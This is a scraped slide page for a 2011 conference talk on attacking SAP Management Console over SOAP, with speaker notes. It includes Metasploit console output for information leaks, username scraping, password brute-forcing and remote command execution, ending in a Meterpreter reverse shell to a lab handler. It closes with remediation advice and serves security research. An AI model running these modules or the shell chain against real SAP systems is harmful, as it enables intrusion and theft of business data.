Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web Application
 
sap basis transaction codes
sap basis transaction codessap basis transaction codes
sap basis transaction codes
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalability
 
SharePoint 2010 Virtualization - SharePoint Saturday East Bay 2010
SharePoint 2010 Virtualization - SharePoint Saturday East Bay 2010SharePoint 2010 Virtualization - SharePoint Saturday East Bay 2010
SharePoint 2010 Virtualization - SharePoint Saturday East Bay 2010
 
SharePoint 2010 Virtualisation - SharePoint Saturday UK
SharePoint 2010 Virtualisation - SharePoint Saturday UKSharePoint 2010 Virtualisation - SharePoint Saturday UK
SharePoint 2010 Virtualisation - SharePoint Saturday UK
 
Mysql tracing
Mysql tracingMysql tracing
Mysql tracing
 
Instrumenting plugins for Performance Schema
Instrumenting plugins for Performance SchemaInstrumenting plugins for Performance Schema
Instrumenting plugins for Performance Schema
 
점진적인 레거시 웹 애플리케이션 개선 과정
점진적인 레거시 웹 애플리케이션 개선 과정점진적인 레거시 웹 애플리케이션 개선 과정
점진적인 레거시 웹 애플리케이션 개선 과정
 
SharePoint 2010 Virtualization
SharePoint 2010 VirtualizationSharePoint 2010 Virtualization
SharePoint 2010 Virtualization
 
Prog1 chap1 and chap 2
Prog1 chap1 and chap 2Prog1 chap1 and chap 2
Prog1 chap1 and chap 2
 
OSMC 2008 | Monitoring MySQL by Geert Vanderkelen
OSMC 2008 | Monitoring MySQL by Geert VanderkelenOSMC 2008 | Monitoring MySQL by Geert Vanderkelen
OSMC 2008 | Monitoring MySQL by Geert Vanderkelen
 
php & performance
php & performance php & performance
php & performance
 
BeeGFS Training.pdf
BeeGFS Training.pdfBeeGFS Training.pdf
BeeGFS Training.pdf
 
Presentation iv implementasi 802x eap tls peap mscha pv2
Presentation iv implementasi 802x eap tls peap mscha pv2Presentation iv implementasi 802x eap tls peap mscha pv2
Presentation iv implementasi 802x eap tls peap mscha pv2
 
Sap basis administrator user guide
Sap basis administrator user guideSap basis administrator user guide
Sap basis administrator user guide
 
The Art of Grey-Box Attack
The Art of Grey-Box AttackThe Art of Grey-Box Attack
The Art of Grey-Box Attack
 
SharePoint 2010's Virtual Reality - SPC2C
SharePoint 2010's Virtual Reality - SPC2CSharePoint 2010's Virtual Reality - SPC2C
SharePoint 2010's Virtual Reality - SPC2C
 
PeopleSoft Integration broker Performance Tunning
PeopleSoft Integration broker Performance TunningPeopleSoft Integration broker Performance Tunning
PeopleSoft Integration broker Performance Tunning
 
Atmosphere Conference 2015: Taming the Modern Datacenter
Atmosphere Conference 2015: Taming the Modern DatacenterAtmosphere Conference 2015: Taming the Modern Datacenter
Atmosphere Conference 2015: Taming the Modern Datacenter
 
SharePoint 2010 Virtualization - Hungarian SharePoint User Group
SharePoint 2010 Virtualization - Hungarian SharePoint User GroupSharePoint 2010 Virtualization - Hungarian SharePoint User Group
SharePoint 2010 Virtualization - Hungarian SharePoint User Group
 

Dernier

08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 

Dernier (20)

08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 

SAP (in)security: Scrubbing SAP clean with SOAP

  • 1. SAP (in)security Scrubbing SAP clean with SOAP Chris John Riley
  • 2.
  • 3. “THE WISEST MAN, IS HE WHO KNOWS, THAT HE KNOWS NOTHING” SOCRATES: APOLOGY, 21D
  • 5. 1) What's what 2) Information is king 3) Getting in the middle 4) Putting it all together 5) Stopping Bob!
  • 7.
  • 8.
  • 9. “…the world's leading provider of business software, SAP (which stands for "Systems, Applications, and Products in Data Processing") delivers products and services that help accelerate business innovation for our customers.”
  • 10. Other people describe them as… “…the world's leading repository of business critical information, SAP (which stands for ”Security Ain't [our] Problem") delivers products and services that helpattackers gain access to critical enterprise data.”
  • 11. Some rights reserved by TrevinC
  • 12. IS IT REALLY THAT BAD?
  • 13. Some rights reserved by Telstar Logistics
  • 14. Some rights reserved by Telstar Logistics
  • 15. So Many Reasons  Vulnerabilties are a part of it!  Every system has it‘s vulnerabilities  SAP installations often fall to business  Not an operations problem  Financial data should be handled by the business  Security team never gets close to it!
  • 16. “YOU CAN'T TEST THAT, IT'S BUSINESS CRITICAL!” UNKNOWN PROJECT MANAGER
  • 17. Some rights reserved by Telstar Logistics
  • 19. You’re getting SOAP all over my SAP! THIS TALK SAP Security Netweaver . SOAP
  • 20. A LITTLE BIT ABOUT SAP MANAGEMENT CONSOLE
  • 21. SAP MC Communications  Default port 5<instance>13/14  50013 HTTP  50014 HTTPS  Can use SSL  If it‘s configured  More on this later!
  • 22. SAP MC Communications  Uses Basic authfor some functions  Yes... It‘s 2011  Yes... Companies still use Basic Auth  Most functions don‘t even use that!
  • 24. ON ALL SAP SYSTEMS!
  • 25. SAP MC MMC Snap-in
  • 26. SAP MC JAVA Applet
  • 28. “If there's one thing SAP MC loves, it's giving away information“ Quote by: Me, just now!
  • 29. Show me the money!
  • 30. Information is king  Version information  Sure, HTTP headers give that!  Nothing new here... mostly  Down to the patch-level  Can you say “targeted attack“
  • 31.
  • 32. Version Information msfauxiliary(sap_mgmt_con_version) > show options Module options (auxiliary/scanner/sap/sap_mgmt_con_version): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no Use a proxy chain RHOSTS 172.16.15.128 yes The target address range RPORT 50013 yes The target port THREADS 1 yes The number of threads URI / no Path to the SAP MC VHOST no HTTP server virtual host
  • 33. Version Information msfauxiliary(sap_mgmt_con_version) > show options Module options (auxiliary/scanner/sap/sap_mgmt_con_version): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no Use a proxy chain RHOSTS 172.16.15.128 yes The target address range RPORT 50013 yes The target port THREADS 1 yes The number of threads URI / no Path to the SAP MC VHOST no HTTP server virtual host
  • 34. Version Information msfauxiliary(sap_mgmt_con_version) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [+] [SAP] Version Number Extracted - 172.16.15.128:50013 [+] [SAP] Version: 720, patch 70, changelist 1203517, optU, NTintel [+] [SAP] SID: NSP [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
  • 35. Version Information msfauxiliary(sap_mgmt_con_version) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [+] [SAP] Version Number Extracted - 172.16.15.128:50013 [+] [SAP] Version: 720, patch 70, changelist 1203517, optU, NTintel [+] [SAP] SID: NSP [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
  • 36. Information is king  Startup profile  Instance name  SAP System Name  SAP SID  SAP DB Schema  Paths  ....
  • 37. Startup Profile msfauxiliary(sap_mgmt_con_startprofile) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [+] [SAP] Startup Profile Extracted: WINXPSAP- TSTsapmntNSPSYSprofileSTART_DVEBMGS00_WINXPSAP -TST [*] SAPSYSTEMNAME = NSP [*] SAPGLOBALHOST = WINXPSAP-TST [*] SAPSYSTEM = 00 [*] INSTANCE_NAME = DVEBMGS00 [*] DIR_PROFILE = WINXPSAP-TSTsapmntNSPSYSprofile [*] _PF = $(DIR_PROFILE)NSP_DVEBMGS00_WINXPSAP-TST [*] dbs/ada/schema = SAPNSP
  • 38. Startup Profile msfauxiliary(sap_mgmt_con_startprofile) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [+] [SAP] Startup Profile Extracted: WINXPSAP- TSTsapmntNSPSYSprofileSTART_DVEBMGS00_WINXPSAP -TST [*] SAPSYSTEMNAME = NSP [*] SAPGLOBALHOST = WINXPSAP-TST [*] SAPSYSTEM = 00 [*] INSTANCE_NAME =DVEBMGS00 [*] DIR_PROFILE = WINXPSAP-TSTsapmntNSPSYSprofile [*] _PF = $(DIR_PROFILE)NSP_DVEBMGS00_WINXPSAP-TST [*] dbs/ada/schema = SAPNSP
  • 39. Information is king  Server / Instance Environment  Computername  Database Names  Database Type (Oracle, MaxDB, ...)  Full Server Environment Variable list!  Information overload  OMG why!
  • 40. Environment msfauxiliary(sap_mgmt_con_getenv) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [*] COMPUTERNAME=WINXPSAP-TST [*] ComSpec=C:WINDOWSsystem32cmd.exe [*] DBMS_TYPE=ada [*] FP_NO_HOST_CHECK=NO [*] OS=Windows_NT [*] USERNAME=SAPServiceNSP [*] PSModulePath=C:windowssystem32PowerShell... [*] SAPEXE=E:usrsapNSPSYSexeucNTI386 [*] TMP=E:usrsapNSPtmp
  • 41. Environment msfauxiliary(sap_mgmt_con_getenv) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [*] COMPUTERNAME=WINXPSAP-TST [*] ComSpec=C:WINDOWSsystem32cmd.exe [*] DBMS_TYPE=ada [*] FP_NO_HOST_CHECK=NO [*] OS=Windows_NT [*] USERNAME=SAPServiceNSP [*] PSModulePath=C:windowssystem32PowerShell... [*] SAPEXE=E:usrsapNSPSYSexeucNTI386 [*] TMP=E:usrsapNSPtmp
  • 42. Information is king  SAP Log/Tracefiles  SAP Startup Logs  Error / Debug Logs  Developer Traces  Security Logs  SAP ABAPSysLog  SAP Startup Times  PIDs  Services + Status Info
  • 43. Log/Trace Files msfauxiliary(sap_mgmt_con_listlogfiles) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface Filename Size Timestamp -------- ---- --------- available.log 2268 2011 10 16 12:52:33 dev_cp 4397 2011 04 19 10:30:48 dev_disp 4612 2011 10 14 15:06:14 dev_icm 6594 2011 10 14 15:07:38 sapstart.log 629 2011 10 14 15:06:04 sapstartsrv.log 754 2011 10 16 10:04:36 stderr1 903 2011 10 14 15:06:04
  • 44. Log/Trace Files <SAPControl:ReadDeveloperTraceResponse> <name>E:usrsapNSPDVEBMGS00workdev_w0<name> <item>trc file: "dev_w0", trc level: 1, release: "720"</item> <item>---------------------------------------------------</item> <item>* ACTIVE TRACE LEVEL 1</item> <item>M pid 3564</item> <item>M DpSysAdmExtCreate: ABAP is active</item> <item>M DpShMCreate: allocated sys_adm at 09A40048</item> <item>M DpShMCreate: allocated wp_adm at 09A43020</item> <item>M DpShMCreate:allocated tm_adm at 09A47E48</item> …
  • 45. ABAP Log File <SAPControl:ABAPReadSyslogResponse><log> <item><Time>2011 10 14 15:06:18</Time> <Text>SAP: ICM started on host WINXPSAP-TST (PID: 3536) </Text><Severity>SAPControl-GREEN</Severity> <item><Time>2011 10 14 15:06:12</Time> <Text>SAP Basis: Active ICU Version 3.4; Compiled With ICU 3.4; Unicode Version 4.1 </Text><Severity>SAPControl-GREEN</Severity></item> …
  • 46. Information is king  Extracting data from logfiles  Logfiles include usernames  Scrape for usernames  Instant brute-force user list!  #wimming!  Just an example of the data availble
  • 47. Extract Users [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [+] [SAP] Users Extracted: 10 entries extracted [+] [SAP] Extracted User: SAPSYS [+] [SAP] Extracted User: TEST1 [+] [SAP] Extracted User: TESTDEV [+] [SAP] Extracted User: ADMIN1 [+] [SAP] Extracted User: SAPADM [+] [SAP] Extracted User: TEST2 …
  • 48. Extract Users [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [+] [SAP] Users Extracted: 10 entries extracted [+] [SAP] Extracted User: SAPSYS [+] [SAP] Extracted User: TEST1 [+] [SAP] Extracted User: TESTDEV [+] [SAP] Extracted User: ADMIN1 [+] [SAP] Extracted User: SAPADM [+] [SAP] Extracted User: TEST2 …
  • 49. Information is king  Process Parameters  Output of the entire SAP configuration  Password Policies  Setup your Brute-force just right ;)  Hash Types  Still supporting those old 8 char hashes?  Security Audit Log Enabled ?  rsau/enabled (default: 0)  Is anybody watching?
  • 50. Process Parameters msfauxiliary(sap_mgmt_con_getprocessparameter) > run [*] [SAP] Connecting to SAP MC on 172.16.15.128:50013 [*] [SAP] Attempting to matche (?i-mx:^login/password) [SAP] Process Parameters Name Value ------ ---------- login/password_charset 1 login/password_downwards_compatibility 1 login/password_hash_algorithm encoding=RFC2307, algorithm=iSSHA-1, saltsize=96 login/password_max_idle_productive 0
  • 51. Process Parameters msfauxiliary(sap_mgmt_con_getprocessparameter) > run [*] [SAP] Connecting to SAP MC on 172.16.15.128:50013 [*] [SAP] Attempting to matche (?i-mx:^login/password) [SAP] Process Parameters Name Value ------ ---------- login/password_charset 1 login/password_downwards_compatibility 1 login/password_hash_algorithm encoding=RFC2307, algorithm=iSSHA-1, saltsize=96 login/password_max_idle_productive 0
  • 52. Process Parameters <SAPControl:GetProcessParameterResponse><parameter> <item><name>DIR_AUDIT</name> <group>System</group> <description>Directory for security audit files</description> <unit/><value>E:usrsapNSPDVEBMGS00log</value></item> <item><name>login/fails_to_user_lock</name> <group>Login</group> <description>Number of invalid login attempts until user lock</description> <unit/><value>5 </value></item> …
  • 53. Process Parameters <SAPControl:GetProcessParameterResponse><parameter> <item><name>DIR_AUDIT</name> <group>System</group> <description>Directory for security audit files</description> <unit/><value>E:usrsapNSPDVEBMGS00log</value></item> <item><name>login/fails_to_user_lock</name> <group>Login</group> <description>Number of invalid login attempts until user lock</description> <unit/><value>5 </value></item> …
  • 54. Information is king  Useful Process Parameters  rsau/enabled  login/password_downward_compatibility  login/failed_user_auto_unlock  login/fails_to_user_lock  login/min_password_lng  login/password_charset  .... *Checkout consolut.com for a great list
  • 55. “I put a whitebox configuration audit in your blackbox penetration test, so you can whitebox SAP while you blackbox it!“ Quote by: Me, just now!
  • 56.
  • 57. Information overload  All unauthenticated  But you have to be IN the network right!  Right?
  • 61.
  • 62. 2,700 Number of SAP servers 2,675 listening on public addresses 2,650 2,625 2,600 2,575 2,550 2,525 2,500 Router Gateway SAP MC SAP MC (SSL)
  • 63.
  • 64. Some rights reserved by Crystl
  • 66. Basic auth is your friend!
  • 68. MAN IN THE MIDDLE…
  • 69. LET ME COUNT THE WAYS…
  • 70.
  • 71. Getting in the middle  Force Authentication  Basic Auth == Clear Text  Credentials FTW!  Alter Requests  Do what YOU want  Alter Responses
  • 74.
  • 75. Getting in the middle  4 different options for SSL protection  Self Signed  Device Default (not an option for SAP)  Enterprise CA  You sign your own certs centrally  Externally signed  Diginotar to the rescue!  SAP also offer signing services
  • 76. Getting in the middle  Impersonate SSL  There‘s a module for that ;)  Creates a fake cert  As close to the original as possible  Useful SE options  Expired yesterday  Add CN names for ease of use
  • 77.
  • 78. PUTTING IT ALL TOGETHER
  • 79.
  • 80. OSExecute  SAP MC generously offers OSExecute function  Valid username/password req.  That‘s handy!
  • 82. MITM  Using the force-auth method  Check under the keyboard  Post-it notes!  Rubber hose method
  • 83. Brute-Force  Metasploit module  Set SAP SID for SAP specific checks  Watchout for lockouts!  Denial of Service?
  • 84. Brute Force msfauxiliary(sap_mgmt_con_brute_login) > set SAP_SID NSP msfauxiliary(sap_mgmt_con_brute_login) > run [*]SAPSID set to 'NSP' - Setting default SAP wordlist [*] Trying username:'sapservicensp' password:'' [-] [01/18] - failed to login as 'sapservicensp' password: '' [*] Trying username:'sapservicensp' password:'sapserviceNSP’ [-] [02/18] - failed to login as 'sapadm' password: '' [*] Trying username:'nspadm' password:'' …
  • 85. OSExecute auxiliary(sap_..._osexec) > set RHOSTS 172.16.15.128 auxiliary(sap_..._osexec) > set USERNAME sapservicensp auxiliary(sap_..._osexec) > set PASSWORD Pr0d@dm1n auxiliary(sap_..._osexec) > set CMD hostname auxiliary(sap_..._osexec) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [+] [SAP] Command run as PID: 1240 Command output -------------- WINXPSAP-TST
  • 86. THANKS, BUT WE WANT METERPETER!
  • 87. Getting Meterpreter  Using tricks built into Metasploit  Encode Payload  Split it up into chucks  Shove it in  Start it up!  Profit
  • 88.
  • 89. OSExecuteMeterpreter msfexploit(sap_mgmt_con_osexec_exploit) > exploit [*] Started reverse handler on 172.16.15.134:4444 [*] Command Stager - 7.42% done (7499/101079 bytes) ... [*] Command Stager - 100.00% done (101079/101079 bytes) [*] Meterpretersession 1 opened(172.16.15.134:4444 -> 172.16.15.128:1144) at 2011-10-16 14:41:59 +0200 meterpreter>getuid Server username: WINXPSAP-TSTSAPServiceNSP
  • 90.
  • 92.
  • 93. WHY IS YOUR SAP MC ACCESSIBLE TO THE WORLD!
  • 95. Fixing the issues  SAP Fix  SAP Note 1439348  Issue also discovered by Onapsis  No idea what it says!  SAP restrict ALL fix info to customers only
  • 96. Next Steps  More Research  Finish the MITM module  Force Auth works now  JAVA Applet deployment not so much  Look at SAP SSL implementation  SSL is a punching bag right now  Sleep
  • 97. Questions ? http://c22.cc contact@c22.cc
  • 98. Big Thanks  The REAL SAP Security Researchers  Onapsis  DSecRG  Raul Siles  CYBSEC  SAP PSRT  DirtySec (You know who you are!)  MacLemon for the PPT-fu  All the people who helped make this happen
  • 99. Thanks for coming http://c22.cc contact@c22.cc
  • 100. Sorry for sucking so bad! http://c22.cc contact@c22.cc

Notes de l'éditeur

  1. Yeah… I said that!SAP is a perfect goal for attackers. All the companies crown jewels in once place!
  2. In 2010 SAP released more than 900 fixes… SAP is a complex product, and complex products always have flaws. Research into coding flaws show 15-50 bugs per 1000 lines of delivered code… not all are security related, but that’s still a lot of bugs!
  3. It’s not ALL SAPs fault… complex configurations user error maintaining backwards compatibilitytake your pick. In offering so much SAP are their own worst enemy.
  4. If security never see it, how can they secure itMore importantly, if they don‘t understand it, how can they ever hope to secure it!
  5. Think aboutTHAT logic for a second!I‘m pretty sure every security professional has heard that at one point or another
  6. So what’s this SOAP thing then
  7. Not a cleaning product!We‘ll be use it to scrub SAP clean howeverI‘m sure lots of you have heard of Web ServicesSimply XML over HTTP or HTTPSFlexible (can run over SMTP...)SO HOW DOES SOAP FIT INTO OUR SAP TOPIC
  8. Yes it’s a sad sad world!SAP MC uses a range of unauthenticated requests, but some of the more fun functions require username/password authentication
  9. Lots of cool dataLots of cool functionsLots of fun to be had!
  10. There’s pages of this stuff… much too much for a slide… and much too much to make this stuff available for attackers!
  11. dbms_typeThe database interface recognizes the type of the database system by the environment variable dbms_type.Possible values: ora, inf, db2, db4, db6, ada, mssOLDER VERSIONS of SAP can include environment variables such as MSSQL_USER
  12. Effect of password policies on keyspace reduction openwallDifferent password compliance rules can reduce the overall keyspace considerably!
  13. So I scanned a small country!
  14. What do we have already- Full server environment Version info SAP SIDDatabase info valid SAP usernames trace and debug logs
  15. Wait... SSL will save us!
  16. Yep.. It’s a feature remember? But we’ve already covered how we could get that
  17. OSExecute is all well and good...Run a single commandGet the response..
  18. Block itFilter itRestrict it to administratorsYES this means internally as well!